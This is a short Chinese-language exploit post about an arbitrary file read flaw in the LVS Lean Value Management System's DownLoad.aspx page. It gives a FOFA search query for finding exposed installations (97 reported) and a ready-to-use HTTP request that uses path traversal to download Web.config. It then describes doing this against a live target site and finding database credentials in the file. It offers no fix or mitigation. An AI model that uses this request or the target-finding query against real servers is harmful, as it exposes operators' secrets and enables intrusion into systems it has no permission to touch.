LVS精益價值管理系統DownLoad.aspx存在任意檔案讀取漏洞

LeouMaster發表於2024-05-26

漏洞描述

該漏洞允許攻擊者透過構造特定的請求,讀取伺服器上的任意檔案,從而可能導致敏感資訊洩露。DownLoad.aspx頁面接受一個檔案路徑作為引數,並直接將其傳遞給檔案讀取函式。這個函式沒有經過嚴格的檢查和過濾,攻擊者可以透過構造惡意請求,包含相對路徑或絕對路徑,從而讀取伺服器上的任意檔案

fofa

body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"

POC

GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

漏洞復現

在fofa中搜尋資產,共有97條資料匹配

image-20240526134501175

訪問目標網站

image-20240526134547842

構造url進行訪問

image-20240526134805006

url雖然跳轉回了登入頁,但是下載了一個web.config檔案

開啟檔案檢視,存在資料庫敏感資訊

image-20240526134935055

相關文章